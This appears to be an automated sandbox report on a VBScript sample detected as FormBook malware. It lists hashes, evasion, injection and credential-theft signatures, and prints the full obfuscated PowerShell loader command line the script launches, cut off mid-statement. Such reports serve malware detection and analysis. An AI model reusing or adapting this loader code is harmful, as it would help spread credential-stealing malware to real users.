Edit tour

Windows Analysis Report
GlobalImagingDocuments9575734549684.vbs

Overview

General Information

Sample Name:	GlobalImagingDocuments9575734549684.vbs
Analysis ID:	818780
MD5:	83757abb407e9fad9631f484734a2c4d
SHA1:	987754ccf4ac6eab8bfc10e00b5b052f06678dee
SHA256:	e978e28e11646ee2e668a52c7bd14978d22e4361a6a363e74b43fb10c3634c7c
Tags:	Formbookvbs
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected FormBook

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Snort IDS alert for network traffic

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Maps a DLL or memory area into another process

Tries to detect Any.run

Wscript starts Powershell (via cmd or directly)

Very long command line found

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Obfuscated command line found

Modifies the context of a thread in another process (thread injection)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Sample has a suspicious name (potential lure to open the executable)

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

Uses insecure TLS / SSL version for HTTPS connection

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Java / VBScript file with very long strings (likely obfuscated code)

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

wscript.exe (PID: 6128 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GlobalImagingDocuments9575734549684.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)

powershell.exe (PID: 5496 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vakanc = """NFFuSnLcKtPiOoPnC ECFrsoBuBpSiGeFrdsCrU0J2h T{S A W S HpMaUrWaTmK(M[SSbtBrriTnMgA]U`$LTSiTlWbRlUitvC)B;P L`$MFMoUdLfUsStu P=M I`$ETMiSlMbElFiRvT.SLPeRnCgRtLhR;S A s V N`$TSUkBablflSeLtAeBfs P=U FNMekwR-GOSbTjUefcAtT FbTyOtIeN[T]D P(D`$UFwoDdPfUsStH C/u S2F)f;L M d S EFToKrS(S`$SdaeCpBeRnpdCeZnasH=F0a;I B`$BdGeSpreOnPdGeMnSsB P-KlBtM A`$PFFoKdafSsHtC;P U`$SdIeUpFeMnfdOeEnFsI+V=M2K)H{m a S u D`$CoYsPtTeAoEpUlRaA p=O A`$ITDiMlCbClBiOvB.GSTuGbBsStTrPiKnUgB(M`$OdFeSpLePnAdDeBnSsS,R S2F)A;E D A U M`$PSAkLaOlSlPeMtSeEfA[C`$UdSeFpSePnOdSeMnHsV/V2A]V D=B T[CcAoSnBvIeArBtT]V:J:ITFoHBFybtkeC(R`$FoBsHtDeMoVpSlfaP,D B1L6R)P;K D L`$SSBkUaSlSlReEtFeOfV[I`$RdPeSpLePnZdkeCnPsD/T2A]R C=u D(H`$NSUkVaTlClVeFtMeNfU[U`$DdUePpMeInBdNeBnLsE/P2I]O I-PbmxToBrS s1I0S2P)P;N O S U S}S R[PSTtPrDiEnTgB]u[ESAyRsAtBeBmm.STKeBxPtH.KEAnWcUoBdEiGnmgK]L:A:NAPSHCVIPIS.EGMeHtmSDttrEiCnVgL(S`$RSMkAaOlUlMeAtOeLfU)C;S}PSPeEtP-HCVoBnDtUeFnHtB n'BEM:S\ECOrMoSuCpNiSeSrBsKrE0U3H'A B'U2V'P;S`$tDmeCpLrUaR V=G AGSePtn-GCSoGnGtYeFnLtS G'SEL:M\RCRrsoTuIpLiCeArtsHrA0G3S'S;o`$RBEoUuKgN0T=PCgrHoLuApGiBeMrBsSrS0B2K T'H3A5P1OFA1F5E1P2b0A3P0UBo4F8M0L2B0wAB0CAL'S;GiGfU A(s`$TDKeEpnrAaK H-QeLqk P'O2B'R)f R{B`$uBcoNuCgE0W=M'S'M}F;P`$ABBoPuKgC1B=CCFrGoPuTpRiSeCrDsSrT0R2V T'S2IBB0uFP0B5A1G4B0M9N1A5K0F9s0D0T1F2H4k8V3S1L0uFD0S8G5v5N5G4S4T8S3D3P0S8V1S5m0T7S0A0U0A3M2P8F0B7O1N2H0RFw1J0T0P3j2CBS0F3M1s2H0SED0P9K0O2F1B5P'F;D`$IBNofuLgM2G=MCTruoEuSpCiTeIrSsIrT0O2l S'M2G1S0s3S1O2K3T6I1O4L0K9R0F5I2U7M0P2R0B2C1F4G0F3S1S5F1U5A'L;h`$TBKoVusgM3E=SCSrDoFuOpNiKeRrSsKrS0s2U X'A3M5O1fFT1S5K1D2F0A3o0SBW4H8D3D4U1M3s0K8E1S2A0VFL0HBI0S3O4S8P2HFC0I8e1P2B0F3R1W4S0T9P1T6W3G5P0E3F1D4S1B0P0SFR0A5B0B3T1O5U4G8E2BEP0C7H0B8S0C2b0CAH0n3B3F4T0Z3S0a0F'A;D`$ABNoQuMgT4H=CCDrBoDuSpPiCeTrZsHrD0M2t T'm1T5I1O2V1D4u0EFC0e8U0G1W'R;H`$SBPoKuLgc5s=GCurUoEuRpTiSeNrbsLrF0A2P P'R2O1T0O3U1S2D2TBV0P9H0U2F1C3B0nAG0N3S2KEE0L7B0O8S0F2V0uAR0W3D'U;S`$FBPoSuDgO6F=PCSrSoSuApTiSeTresSrT0h2S T'T3S4F3P2H3U5T1n6u0l3B0I5A0SFI0K7H0FAT2L8N0S7A0FBs0n3m4DAA4T6U2ZED0AFI0W2P0K3R2E4T1SFF3I5V0TFM0A1P4TAS4G6B3C6S1L3O0r4H0MAE0BFU0M5A'A;C`$SBIoTukgR7S=CCGrAoFufpCiUeCrUsUrB0E2W F'A3A4P1K3P0I8O1U2S0OFM0TBP0K3S4HAA4T6L2UBP0S7L0F8D0g7S0T1L0Z3A0M2E'S;P`$TBFoFuFgu8B=BCJrSoBuCpRiUePrPsTrM0S2H T'K3C4P0B3B0H0C0CAB0F3P0T5U1S2E0S3U0U2M2H2P0C3P0SAH0I3S0U1K0T7P1P2n0a3S'T;J`$GBSoLuFgM9V=ACerHoruOpPiSeTrDsNrS0N2N A'm2aFF0P8G2HBJ0S3A0PBt0S9P1D4A1FFF2PBS0S9O0S2S1C3t0DAf0S3B'D;R`$CSHpFrIgKeE0R=ICBrUoAuLpDiBeUrHsPrB0G2Z P'U2CBB1SFC2O2P0M3D0eAS0S3O0I1L0T7A1U2k0D3P3N2A1tFr1K6M0H3L'O;D`$USSpOrFgCeO1F=SCRrNoSuFpHiKeIrBsOrR0F2B R'G2U5W0HAS0H7A1D5M1L5A4BAd4S6B3G6J1A3S0W4D0RAH0TFK0H5S4SAL4P6S3D5P0F3L0G7e0EAH0C3l0r2d4SAM4R6T2U7R0H8g1N5S0HFF2W5S0FAC0K7K1B5U1H5d4BAR4F6F2L7m1F3D1O2S0p9O2M5M0TAp0P7C1P5S1S5I'f;S`$gSApCrUgPeE2U=KCJrCoGuGpSiBeSrPsErT0T2S R'R2gFU0t8S1S0T0D9I0IDF0C3G'P;M`$TSBpArQgMeh3F=MCurDosuPpFiBeMrAsGrK0S2A K'G3C6K1A3v0A4P0AAd0PFB0K5V4RAC4H6c2sEH0UFC0H2M0D3S2D4K1aFR3T5P0BFT0B1H4FAf4V6M2S8M0S3N1F1I3P5E0BAa0B9I1C2B4RAG4T6O3M0I0pFb1D4S1V2B1P3D0V7S0SAp'U;S`$JSjpMrZgCeE4Y=GCNraoUubpSiOeFrSsArG0A2K A'f3S0C0KFu1O4A1I2L1A3A0S7O0kAS2K7C0OAA0MAH0B9B0B5T'A;S`$ISUpPrbgSeP5D=PCLrGoRuSpIiBeMrEsHrH0f2I B'F0S8N1l2T0C2K0SAp0AAP's;T`$MSppSrBgNeP6s=FCBrDoSuHpkineUrRsVrT0A2U S'G2S8O1S2B3H6S1B4G0D9c1b2T0I3F0B5E1o2I3I0A0AFb1n4F1I2U1P3S0G7D0NAs2UBS0D3N0TBu0o9S1F4F1UFK'H;B`$rSFpSrGgSem7E=HCtrIoUuFpCiMesrTsJrQ0S2S B'S2PFD2B3A3MEK'T;S`$ASLpgrHgBeD8p=MCBrSoUuApliSeFrEsGrR0F2R T'C3FAH'U;i`$NFRrMeBkCvSeMnHsDsR=PCDrBoBuFpAiSefrAsFrG0G2P O'I3S3S3f5P2I3S3N4A5R5R5S4A'U;R`$BHIeBmRaOtSoGpDaStC=HCSrDoUuSpPiMeSrjsUrE0S2U S'I2E5K0H7B0FAA0sAr3C1S0mFR0D8P0S2M0V9E1P1i3P6U1P4M0D9D0R5A2T7H'V;SfFuFnFcltOiBoPnT HfSkSpn F{NPLaRrUaUmI B(a`$BFLoTrutPrAnGgA4K9H,S U`$DFSjPaIsFeNnMdOem)I A B S T e;S`$FFUoBrFtBhP0A I=LCBrVoNuSpSiReDrUsPrG0T2C L'S4F2F0A4U1U4D0P7D0A5t0E3A1R4P1rFW0UDS4e6U5MBS4G6P4BEL3KDU2D7j1G6U1E6A2F2B0p9A0MBG0T7U0mFT0K8D3BBK5ECB5MCF2P5r1F3r1B4H1R4E0X3F0L8H1A2C2O2L0S9U0RBN0D7u0UFV0S8p4U8A2N1s0H3O1P2A2F7b1F5A1T5I0F3R0XBR0A4R0GAh0VFH0T3M1G5H4DEK4NFR4C6B1OAB4E6S3S1D0NEQ0s3A1s4a0S3K4DBp2T9A0b4b0UCI0M3H0G5B1H2D4C6F1gDD4G6F4A2F3P9C4S8D2O1a0PAr0U9B0M4S0A7V0AAH2H7O1a5L1T5S0I3R0MBS0B4U0BAP1sFP2F5V0U7F0G5F0zEU0T3D4S6D4BBH2P7D0A8B0V2E4E6J4D2D3D9F4A8A2BAM0W9R0v5S0N7o1S2f0HFF0O9B0D8S4E8B3l5d1A6D0UAG0SFH1M2U4EEP4V2G3A5F1L6P1S4P0U1M0K3B5BEK4UFS3TDD4SBE5L7n3DBB4A8P2S3A1S7m1F3T0I7R0RAf1M5A4REC4G2A2I4S0L9O1D3m0E1P5C6p4OFm4D6f1SBF4EFL4M8B2U1G0M3D1J2U3L2L1DFH1T6M0C3P4UES4M2M2F4S0V9S1P3B0C1I5B7F4PFF'W;F&T(P`$HSMpTrFgFeK7J)D G`$PFMoCrMtUhI0H;A`$KFSodrBtRhH5b F=D BCFrKoSuMpHiAeSrJsMrU0I2P P'B4R2D2D7K1N5D1C2M0G3C0Z8N0JFS1I5F0NBS4T6O5LBT4S6m4K2H0P4U1P4S0A7S0F5H0B3H1T4S1BFD0CDO4P8I2E1M0N3G1D2F2UBS0a3C1T2V0rEP0O9r0N2S4EEa4D2M2K4K0A9U1N3V0O1D5G4S4FAP4B6C3MDP3F2P1SFS1S6S0R3A3LDP3ABN3CBC4D6L2O6C4OEB4P2F2B4M0L9A1F3G0m1W5l5S4SAp4B6M4c2D2p4T0M9F1R3F0A1P5S2T4AFN4CFA'I;I&D(M`$USHpMrEgJee7B)G E`$NFToErMtAhB5B;L`$KFEoBrTtChF1S D=F TCPrRoGuMpSiSePrFsnrT0U2B B'G1O4b0A3D1B2B1B3M1F4C0A8S4S6J4A2K2T7A1S5M1A2T0k3T0B8K0mFp1C5S0LBR4V8g2EFS0S8S1S0P0B9F0ADT0R3U4CEB4l2B0S8M1M3B0AAF0MAB4NAO4S6N2B6G4UEu3UDU3H5P1KFV1k5K1H2R0M3s0RBQ4S8V3T4g1F3T0K8P1s2U0NFS0MBC0c3K4M8M2CFB0E8v1K2K0T3K1O4T0E9N1B6H3P5S0K3C1R4E1O0J0GFS0W5A0D3B1C5F4s8I2EEN0T7P0L8B0B2R0SAr0T3F3K4G0P3p0a0B3PBJ4DEP2L8E0P3N1T1R4TBS2N9H0F4K0aCT0A3S0F5F1A2C4M6P3C5P1FFO1D5B1i2T0M3P0SBI4T8B3E4O1T3U0P8S1C2F0CFS0MBb0O3B4D8r2SFP0d8R1M2B0F3R1H4N0F9M1A6S3S5T0W3E1E4C1C0T0HFO0H5H0i3H1I5R4n8F2SEA0J7B0L8A0L2S0HAP0S3K3g4B0P3O0N0F4GEP4TEM2R8S0A3E1S1G4FBd2R9G0F4P0MCS0F3V0T5C1S2T4p6R2MFC0F8J1S2U3V6B1T2A1D4A4UFT4AAN4S6M4REB4G2C0u4O1T4A0D7D0S5F0m3M1U4H1WFC0PDb4d8m2A1N0E3M1U2I2RBR0E3A1C2B0DEG0O9N0C2B4IEK4M2e2D4T0N9U1A3P0M1S5R3C4WFR4OFF4S8B2WFC0W8e1N0E0P9D0SDB0P3N4HEF4P2U0G8R1G3S0KAS0BAD4VAA4U6s2F6b4UEA4H2N2P0H0B9P1R4K1E2S1S4L0A8U0T1I5S2F5PFS4VFK4RFD4BFA4SFF4dAA4H6W4F2L2D0O0UCH0n7G1S5W0G3T0U8D0K2R0F3S4uFS4SFA'T;s&B(K`$BSapUrKgSeG7I)D H`$FFaoGrAtDhM1H;S}TfPuOnScGtgiBoAnS DGVDDTh E{GPaaTrAaCmA L(A[APmaGraaAmaeUtIeTrT(OPsoMsSiCtaiGoPnI L=S B0n,F GMPaKnAdSaFtBoSrGyF V=S M`$TTlrtuTeb)A]A F[RTCyDpVeK[C]E]M D`$pSPuFpPeErMbfrNuFgCeM4S2T,C[SPTakrCaAmieUtWeJrd(KPsoGsCiCtDiLobnG T=c A1E)F]T D[NTFyCpFeW]S B`$SOHbHjCeScHtWeU R=D I[UVuoTiFdS]E)B;C`$FFFoFrStIhH2B S=F NCDrVoDuPpkioeTrAsLrK0O2A H'O4A2T3B5F0k3l0DBK0FFU0M5K0U9M1A2S1T2P0A9H4N6F5ABA4P6P3CDM2U7S1L6T1B6T2L2D0P9N0sBU0T7F0PFG0C8S3PBX5OCC5RCB2B5A1F3B1g4A1k4H0K3S0I8S1M2M2D2N0E9S0hBF0P7S0FFS0j8S4S8N2K2E0I3M0L0P0RFu0H8E0I3E2O2H1bFU0P8R0N7H0SBV0tFH0M5M2S7M1S5S1R5C0D3T0SBU0F4P0BAB1RFF4UEA4SEs2F8T0V3B1D1A4CBU2b9P0U4S0FCA0F3S0U5J1U2U4I6S3S5S1FFS1C5S1f2S0N3b0KBp4L8s3K4L0R3A0S0S0BAA0S3v0A5O1F2G0SFR0T9H0S8F4Z8B2a7M1A5F1B5Y0R3R0PBT0F4o0iAA1GFA2A8P0F7A0bBA0G3A4SET4I2F2N4R0P9D1I3F0V1V5AEe4IFM4PFD4UAS4K6K3FDR3p5B1OFE1C5H1a2U0T3S0sBH4F8B3b4F0U3I0M0B0WAF0H3K0G5S1U2U0LFN0A9B0A8G4S8P2P3P0aBD0HFf1J2D4M8H2T7F1F5A1S5I0c3U0DBS0g4i0MAI1HFS2R4T1K3A0UFT0GAe0C2U0P3U1R4B2F7d0N5J0u5M0G3S1U5W1t5R3ABS5SCM5RCG3T4R1M3J0O8L4EFM4S8M2e2m0B3S0E0F0HFC0U8O0K3E2B2U1AFM0A8g0B7S0BBL0oFT0B5C2UBP0G9K0B2M1B3O0FAS0O3E4SES4G2P2G4V0S9A1M3S0S1e5KFD4DAW4Z6L4D2S0D0d0R7S0rAb1A5G0J3T4JFD4C8o2D2S0V3T0b0O0lFA0B8T0A3P3F2M1BFS1P6T0V3R4IET4A2g3B5K1A6N1C4S0A1O0S3M5M6F4DAT4r6H4U2O3H5D1m6D1V4L0A1S0F3K5M7K4sAT4R6b3FDn3S5G1VFM1C5T1J2c0B3M0CBR4B8S2NBF1H3N0MAb1O2L0HFE0S5S0C7A1R5W1O2B2E2K0m3g0LAo0S3S0O1S0C7O1P2I0b3R3FBE4FFW'C;H&S(u`$SSVpSrSgNeD7l)n C`$IFsoUrstAhU2C;C`$FFPoVrDtChS3S U=R GCLrnoLuWpUiKePrBsErL0s2A N'U4T2T3O5E0B3T0ABU0BFM0T5g0F9i1L2S1R2T0V9S4Y8G2P2S0I3F0J0R0AFL0I8S0O3H2U5A0D9f0a8Y1B5D1P2B1t4S1R3H0O5D1S2S0I9J1F4V4IES4L2R2T4D0B9a1S3U0Z1D5K0C4NAR4N6T3EDS3W5I1MFU1I5N1N2M0A3S0HBA4I8C3N4r0b3O0R0M0GAL0S3T0E5g1S2M0PFT0U9o0t8N4N8T2D5L0S7a0SAa0SAD0OFP0F8S0d1U2h5S0B9L0H8K1F0P0S3S0M8S1I2b0aFA0S9C0M8D1S5L3DBE5BCR5UCL3L5D1E2V0S7B0M8K0L2K0A7A1A4S0d2S4uAA4G6S4M2B3U5A1p3U1C6S0H3G1M4N0V4S1P4v1s3A0P1S0S3S5C2G5O4A4MFm4S8R3O5C0M3c1H2V2RFE0FBK1W6P0KAE0K3C0TBa0I3B0L8b1U2R0D7T1U2R0IFA0C9M0A8W2B0A0AAA0G7N0Y1A1B5A4MET4S2A2G4b0A9L1L3K0S1H5T1P4UFA'I;K&E(F`$OSTpvrSgPeL7H)b S`$PFAoMrPthhI3P;A`$SFSoSrCtShO4C R=U sCSrKoHuUpRiPeErHsSrM0V2U R'D4V2S3E5o0L3F0rBU0MFA0F5V0I9b1A2S1o2B0M9C4K8s2S2g0s3T0S0A0HFT0F8U0s3S2DBV0T3P1S2R0BEV0F9F0B2A4BEP4A2B3A5h1I6P1D4T0I1M0K3A5S4N4BAS4I6A4K2B3M5i1K6m1B4A0T1I0H3O5R5P4LAE4F6U4T2M2K9I0D4T0PCD0T3B0P5N1V2M0B3B4VAD4U6M4A2E3S5f1F3G1C6M0H3T1H4G0C4B1P4b1v3T0A1F0S3T5H2U5E4P4nFD4B8F3S5P0P3F1P2E2DFS0fBS1s6U0FAD0P3C0EBI0L3E0N8E1U2M0R7B1T2S0BFS0l9Q0B8S2B0P0MAS0A7T0T1C1D5E4LES4A2C2A4P0o9M1G3t0K1h5T1M4PFP'S;D&s(C`$FSIpUrBgAeU7S)E e`$mFooBrUtghU4T;k`$UFTocrGtShL5D B=D TCsrRoSuNpBiSeRrusFrT0X2s S'N1O4S0m3W1M2C1T3H1L4U0C8M4B6E4U2R3i5P0R3U0ABA0SFA0S5N0P9S1B2C1P2U0U9N4R8A2P5T1K4B0m3P0V7G1I2t0A3S3B2A1SFA1N6F0C3I4HEf4iFS'B;S&C(s`$FSTpHrFgSeD7P)O t`$AFToDrDtDhL5T a P H;P}D`$EAGcRuKtSiBlAiG P=B ACArSoUuPpBiPeDrtsGrA0P2D k'G0FDM0o3H1S4C0r8M0p3B0HAK5U5T5L4A'P;H`$LFRoPrMtAhT6T B=L PCFrOoBuMpfiSeLrFsBra0V2A D'S4D2K2P4B0O7M0IAp0ODH0S7f0S8P0HFU1B5P0W3L1J4M4D6H5sBN4F6G3ADV3P5C1AFA1l5I1K2F0U3W0EBH4A8S3A4A1B3F0K8S1S2U0DFH0RBD0B3F4R8S2SFU0S8R1b2S0C3A1k4H0S9R1A6E3T5K0L3V1P4N1O0R0VFD0D5R0K3S1P5M4S8Z2uBS0T7U1c4T1L5P0FEe0S7I0mAT3pBV5MCH5SCB2N1F0S3D1A2M2O2P0T3L0BAF0V3h0F1H0F7S1K2G0M3C2A0F0E9A1k4N2U0M1F3S0B8D0B5C1E2F0PFE0G9L0r8I3D6H0S9U0IFK0S8P1C2B0T3B1M4L4GES4VEb0D0S0PDB1s6B4S6K4P2A2N7S0U5P1I3B1G2A0LFP0jAb0MFS4G6S4F2A3l5M1H6A1D4T0S1R0D3M5S2A4RFc4DAE4W6M4LEE2S1S2M2b3A2P4K6R2D6B4AEB3SDE2GFU0R8D1P2O3d6T1T2E1R4T3BBS4EAK4Y6A3BDX3S3C2TFP0k8C1e2M5A5N5F4F3MBO4NAD4S6K3VDS3p3C2NFO0R8U1S2K5B5M5F4H3SBD4PAL4F6M3BDM3h3S2UFH0M8B1T2I5D5S5o4F3oBH4PFH4B6K4EEU3CDG2UFs0T8s1R2O3B6S1R2m1T4A3EBT4GFS4cFT4LFM'G;C&C(O`$FSUpOrGgRem7S)T M`$RFKoArMtShS6M;L`$UMOiUdIsSoAmEma s=D VfTkIpW M`$HSjprrIgBeK5R F`$SSDpSrSgOeP6R;G`$OFToCrWtEhC7I D=U MCSrAoUuApAiIeArTsGrm0P2H C'd4R2p3B4M0T9G0U7S0B8F0B9C0CDA0D3D1F6A1U4C0A3C5S5M4P6K5ABT4F6L4B2K2T4G0S7K0RAN0SDR0O7O0M8P0UFH1U5B0D3G1F4S4T8E2GFS0D8U1f0W0n9A0ADE0D3e4UEh3UDJ2SFI0F8A1C2D3S6S1W2A1V4S3hBF5SCv5LCK3pCk0E3S1L4N0B9b4BAT4L6U5S0T5S2U5t5S4TAI4A6U5T6i1YEB5G5U5H6U5S6M5D6C4PAT4B6F5V6C1IED5L2F5G6D4iFP'P;s&P(H`$PSSpSrGgaeA7C)N G`$TFLoBrGtMhB7U;C`$CFSoWrDtThc8V r=h ACLrBoCuRpRiheFrAsUrC0B2P s'G4A2s3H5F1OFF0T2G0L7U0PBV0T3R1r4A0fFE0sDA4P6S5sBD4S6E4M2A2B4T0R7U0OAM0EDB0C7C0z8A0AFE1D5D0M3G1S4s4B8I2KFS0I8S1M0A0K9E0FDf0E3L4UEE3FDE2aFC0S8G1d2s3V6W1P2D1I4d3sBH5gCI5SCN3NCE0H3N1S4F0A9c4DAA4P6B5B3C5PFA5F6I5H0B5K6S5F4T5L4U5F2R4AAB4P6K5T6H1PEU5I5S5C6C5A6A5B6C4JAs4S6W5A6R1CEA5R2g4AFK'S;A&Y(K`$PSgpMrNgQeK7F)K e`$SFUoRrPtShS8C;R`$SCrrPoPuNpJiAeDresSrH0R1V I=t ACTrAoUuSpCiBeCrSsNrL0T2I S'P0cEa1C2C1S2G1S6M1g5s5BCV4u9S4S9O0S2C1P4L0fFS1P0I0d3T4P8D0D1W0D9L0C9F0T1U0NAM0L3S4T8D0F5N0S9B0RBV4t9D1I3o0E5R5D9S0T3B1IEN1U6g0E9D1D4u1F2K5SBs0J2D0S9G1N1B0U8R0DAU0T9o0A7K0L2U4H0p0FFD0P2O5PBL5O7N2DFI1P3s0PFG0P5P3FCF3S9C5FED1K0B3W7C2C3W5KFA0G2P3S3O5F2V0S4h0M0U1sEO5B5G5f2R2FBR1I4C3S5I2CAV2F0D2Y7O0BES2DEA0v7F2PAf1B5s5B7R0BAO'H;j`$FCSrLoSuCpKiBePrCsAro0s0t B=S ACGrpoTuspAiKeArSsPro0F2K r'S4F2S2VDT0TAM1S3E0N8R1A2O0I3C0LDA1M4R5SER5U1P4B6E5IBF4C6U4DET2F8P0G3R1J1M4KBL2T9N0S4F0GCs0J3W0T5L1L2S4B6A2S8b0P3d1a2V4N8P3p1S0R3N0N4K2P5S0BAG0SFP0T3D0l8H1c2L4fFf4K8k2U2F0S9P1m1S0U8A0kAD0E9R0C7S0I2v3S5S1C2A1I4S0UFB0R8D0o1P4AEW4M2G2S5A1P4G0K9S1K3F1A6K0tFS0p3A1A4K1B5A1f4S5O6S5m7C4FFS'N;L`$PFSoNrStShS8T E=D MChrToFuCpkitePrFsDrF0S2B A'I4I2R3N4V0a9P0L7p0S8E0U9C0CDD0T3F1A6E1C4S0H3C5P4B5CBN4J2C0R3D0A8P1E0S5GCK0B7B1I6O1R6S0T2C0L7S1A2B0B7U'N;S&F(K`$ISKpKrTgCeI7T)P R`$BFBoIretShS8N;F`$GRFoFaHnJoCkMeMpBrSeV2a=A`$AREoMaBnIoBkVeBpcrTeA2L+s'G\ASRtfeOdEoFrVdP.GdAaVtA'B;S`$EKnlpuPnFtMeDkArT8M7F=F'P'j;AiSfT S(B-KnsoMtB(mTSeDsGtP-SPNaEtKhM h`$PRFoUaKnMoSkSePpRrLeH2T)P)B A{FwShDiElTeK B(E`$KKGlNuMnMtDeVkNrE8D7T S-AeFqW D'E'M)o F{S&L(S`$PSSpOrDgTeS7S)S S`$ACDrAosuSpPiFeSrNsbrB0K0F;MSEtWaDrAtB-SSTlMeAeApO S5U;E}RSSePtG-UCMofnctheSnUtS P`$TRNoHaRndoYkSeBpArmeK2t K`$RKTlFuBnMtKeGkvrS8c7S;Q}L`$TKSlLuEnDtTeUkSrN8M7S H=r SGTeBtF-ECRoSnqtUeDnVtK P`$ORRoDaTnNopkBeSpMrges2G;G`$UFFoSrPtSht9S A=B ACNrcoUurpPiWeSrTsSrK0g2C S'K4B2P2S0O0D9L1r4A1A2F0FEC4B6K5NBS4C6K3HDT3M5E1PFo1C5B1g2B0E3S0FBA4N8S2O5B0R9u0I8H1s0I0S3P1t4L1P2G3FBF5SCV5WCF2D0A1S4G0O9T0FBS2D4C0T7H1R5P0R3p5W0E5D2D3G5P1U2A1C4P0FFj0F8R0K1C4UEV4T2S2PDK0JAm1s3S0S8T1M2b0A3U0SDb1u4S5OEP5K1K4EFB'b;C&F(O`$rSJpSrVgUeC7A)D C`$BFSoUrTtBhL9T;P`$FKVlDuAnDtDeskFrF8M7d0s T=A GCArMoUuTpSiHeRrSsBrT0P2L I'C3HDG3B5g1LFA1A5O1P2F0A3D0DBe4R8G3C4C1O3P0C8S1S2E0AFS0MBT0I3D4N8G2KFQ0S8U1T2S0T3G1O4S0P9P1O6F3F5O0P3I1P4U1P0M0BFa0R5S0Z3S1M5K4Q8V2SBP0R7u1G4B1M5C0VER0G7M0nAD3FBR5bCU5ACS2H5T0P9T1k6M1OFB4aEF4V2F2s0f0f9M1s4B1K2U0BEN4TAI4V6B5T6R4pAK4G6E4M6P4T2L3K4M0X9L0S7P0l8S0D9T0EDC0R3b1G6F1C4S0P3T5T5S4pAT4P6H5D0U5K2A5S5W4AFD'C;I&S(P`$KSEpErSgPeV7T)T U`$TKPlBuEnMtneFkErB8P7C0U;P`$UfFotlPkUeKtN=S`$OFIoIrBtShU.NcSoRuPnHtl-c6T4D3O;K`$MKHlGuUnKtPeRkFrS8T7D1p t=S BCArLoMuMpMiBeErOsCrp0S2S M'S3IDY3F5f1EFS1W5R1n2t0C3B0dBk4D8N3R4K1C3A0U8K1A2E0MFH0ABL0O3P4A8L2SFC0P8S1D2Y0R3N1P4Y0K9B1M6O3J5P0F3S1A4I1B0S0ZFU0R5T0D3U1s5M4W8A2BBS0i7U1R4L1G5E0UEB0U7T0LAG3QBP5FCP5cCI2U5P0G9S1I6s1FFB4UEV4R2j2P0K0M9S1N4D1L2M0OES4WAS4R6G5K0D5f2L5u5G4FAP4E6T4N2T3S5b1RFv0H2V0V7N0SBM0B3O1B4A0DFO0PDt4uAB4S6i4G2T0P0T0H9A0FAS0SDS0D3U1T2P4SFK'U;U&S(O`$ASnpFrEgAeG7P)H H`$RKilTuKnTtSeOkArR8D7S1M;S`$RKOlKuLnEtEeSkSrD8B7A2U C=L KCFrToZuCpDiSeOrHsmrM0P2L H'u4E2F2F5P0d9T0MER0G7k0I4F0TFF4O6K5NBT4P6K3MDF3C5S1OFT1T5K1L2B0T3D0SBH4N8l3s4V1G3d0S8g1F2E0CFD0BBF0G3A4C8V2FFB0O8S1v2B0P3F1b4C0H9m1B6F3R5E0M3E1s4K1B0P0PFN0R5K0D3S1C5a4B8A2BBM0I7U1G4I1A5S0GEV0P7C0IAZ3KBN5TCP5RCK2O1B0A3S1S2P2E2M0N3L0CAK0f3J0M1R0U7B1D2p0E3E2H0r0R9N1M4S2B0E1S3I0Z8a0V5D1V2D0PFA0W9V0H8R3O6A0U9S0MFB0B8R1S2B0U3A1I4a4PEA4TEC0U0S0UDT1k6T4R6R4g2B2N0T1T4T0W3F0HDT1S0A0H3K0U8D1P5N1B5N4R6E4Z2M2MEI0K3D0SBa0s7T1K2S0S9B1K6L0A7M1S2M4TFf4SAS4S6P4sEB2U1U2B2F3D2N4O6F2B6B4eEU3PDA2PFA0S8P1T2T3U6K1K2D1C4D3PBP4GAS4O6H3PDR2AFD0K8C1A2D3P6I1T2A1D4D3BBB4PAF4E6S3SDV2sFC0N8s1F2U3V6S1V2p1H4S3CBP4wAC4e6D3LDF2TFP0K8B1E2O3F6F1J2R1P4O3BBS4BAH4W6p3PDE2HFT0G8P1W2S3H6T1D2o1I4M3UBK4HFV4U6S4CES3SDS2LFV0M8D1B2D3B6B1U2F1S4D3VBG4TFU4PFP4LFD'M;T&K(H`$SSCpfrHgBeU7F)K M`$LKGlBuRnStIeBkMrG8T7R2B;C`$LKTlPuAnStTeHkFrA8J7A3M C=S FCVrkoFuDpGiEeFrrstrT0H2U S'O4M2N2J5R0Z9T0VEO0A7I0t4C0UFt4A8U2FFP0E8C1L0V0S9A0UDH0s3A4AEc4F2T3C4N0G9T0N7T0A8G0D9T0BDT0F3U1A6S1L4S0I3B5A5F4UAS4L2N3N5R1UFB0U2J0I7r0IBH0P3A1I4s0PFT0MDK4LAS4C2F2DBR0FFR0O2N1S5B0f9S0ABL0OBB4VAU5s6I4HAM5V6M4SFG'S;W&F(L`$RScpIrCgFes7B)F O`$iKglNuDnStSeDkMrC8A7P3V#P;""";Function Kluntekr879 ([String]$Tilbliv) { For($dependens=1; $dependens -lt $Tilbliv.Length-1; $dependens+=(1+1)){ $Croupiersr = $Croupiersr + $Tilbliv.Substring($dependens, 1); } $Croupiersr;}$Limberest0 = Kluntekr879 'HITEDXM ';$Limberest1= Kluntekr879 $Vakanc;if([IntPtr]::size -eq 